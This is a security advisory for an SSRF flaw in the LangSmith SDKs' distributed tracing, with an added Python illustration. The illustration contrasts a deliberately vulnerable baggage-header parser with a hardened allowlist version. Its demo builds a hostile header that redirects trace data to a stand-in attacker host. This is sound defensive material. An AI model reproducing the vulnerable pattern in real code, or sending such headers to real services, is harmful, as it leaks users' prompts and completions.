Langsmith · Langsmith Client Sdks · CVE-2026-25528
**Name of the Vulnerable Software and Affected Versions**
LangSmith Python SDK versions prior to 0.6.3
LangSmith JavaScript SDK versions prior to 0.4.6
**Description**
The LangSmith SDK’s distributed tracing feature is susceptible to Server-Side Request Forgery (SSRF) through manipulation of HTTP headers. An attacker can inject arbitrary `api_url` values via the baggage header, potentially causing the SDK to transmit sensitive trace data (including prompts and completions) to attacker-controlled endpoints. The SDK parses incoming HTTP headers using `RunTree.from_headers()` in Python and `RunTree.fromHeaders()` in TypeScript, and accepts attacker-controlled values in the `api_url` and `api_key` fields of the baggage header without validation. When a traced operation completes, the SDK’s `post()` and `patch()` methods transmit run data to all configured replica URLs, including those injected by an attacker.
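The following is an added illustration of the pattern the description above outlines, not code from the LangSmith SDK: a minimal W3C-style baggage parser, an unvalidated "any `api_url`/`api_key` in the header becomes a replica" routine next to a hardened one that only accepts `https` endpoints whose host is on a process-local allowlist and never takes the API key from the request, and the fan-out that posts a finished run to every replica. The member names `api_url` and `api_key`, the `Replica` structure, the allowlist and the host names are assumptions made for this example.

```python
"""Added example (not LangSmith SDK code) showing why header-supplied replica
endpoints are an SSRF/data-exfiltration risk and how to constrain them."""
from __future__ import annotations

from dataclasses import dataclass
from typing import Callable
from urllib.parse import unquote, urlparse

# Assumed baggage member names; the advisory says api_url/api_key travel in the
# baggage header but does not specify the exact encoding.
API_URL_MEMBER = "api_url"
API_KEY_MEMBER = "api_key"

# Assumed process-local allowlist of hosts trace data may be sent to.
TRUSTED_TRACE_HOSTS = frozenset({"trace-ingest.example"})


@dataclass(frozen=True)
class Replica:
    api_url: str
    api_key: str


def parse_baggage(header: str) -> dict[str, str]:
    """Parse a W3C baggage header ('k1=v1;prop,k2=v2') into a dict.
    Values are percent-decoded; per-member properties after ';' are dropped."""
    members: dict[str, str] = {}
    for raw in header.split(","):
        kv = raw.split(";", 1)[0].strip()
        if "=" not in kv:
            continue
        key, value = kv.split("=", 1)
        members[key.strip()] = unquote(value.strip())
    return members


def replicas_unvalidated(headers: dict[str, str], local: Replica) -> list[Replica]:
    """Vulnerable pattern: whatever api_url/api_key appear in baggage become an
    extra replica, so the sender of the request chooses where runs are posted."""
    members = parse_baggage(headers.get("baggage", ""))
    replicas = [local]
    if API_URL_MEMBER in members:
        replicas.append(Replica(members[API_URL_MEMBER],
                                members.get(API_KEY_MEMBER, local.api_key)))
    return replicas


def replicas_hardened(headers: dict[str, str], local: Replica,
                      trusted_hosts: frozenset[str] = TRUSTED_TRACE_HOSTS) -> list[Replica]:
    """Hardened pattern: a header-supplied endpoint is honoured only if it is
    https and its host is allowlisted; the api_key always stays process-local."""
    members = parse_baggage(headers.get("baggage", ""))
    replicas = [local]
    url = members.get(API_URL_MEMBER)
    if url is None:
        return replicas
    parsed = urlparse(url)
    if parsed.scheme == "https" and parsed.hostname in trusted_hosts and url != local.api_url:
        replicas.append(Replica(url, local.api_key))
    return replicas


def post_run(run: dict, replicas: list[Replica],
             transport: Callable[[str, str, dict], None]) -> list[str]:
    """Mimics the fan-out on run completion: the run payload (prompts,
    completions, ...) is sent to every replica. Returns the URLs that got it."""
    sent: list[str] = []
    for replica in replicas:
        transport(replica.api_url, replica.api_key, run)
        sent.append(replica.api_url)
    return sent


if __name__ == "__main__":
    # Constructed sample: a request whose baggage header carries a foreign endpoint.
    local = Replica("https://trace-ingest.example/api/v1", "local-secret")
    hostile = {"baggage": "api_url=https%3A%2F%2Fcollector.attacker.example%2Fv1,api_key=leaked"}
    run = {"name": "chat", "inputs": {"prompt": "..."}, "outputs": {"completion": "..."}}

    def log_transport(url: str, key: str, payload: dict) -> None:
        print(f"POST {url} (key={key[:4]}...) run={payload['name']}")

    print("unvalidated:", post_run(run, replicas_unvalidated(hostile, local), log_transport))
    print("hardened:   ", post_run(run, replicas_hardened(hostile, local), log_transport))
```

Beyond the allowlist, a rejected header-supplied `api_url` is worth logging with the source request identifiers: a burst of such rejections is a cheap detection signal that someone is probing the tracing path.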
**Recommendations**
Update the Python SDK to version 0.6.3 or later.
Update the JavaScript SDK to version 0.4.6 or later.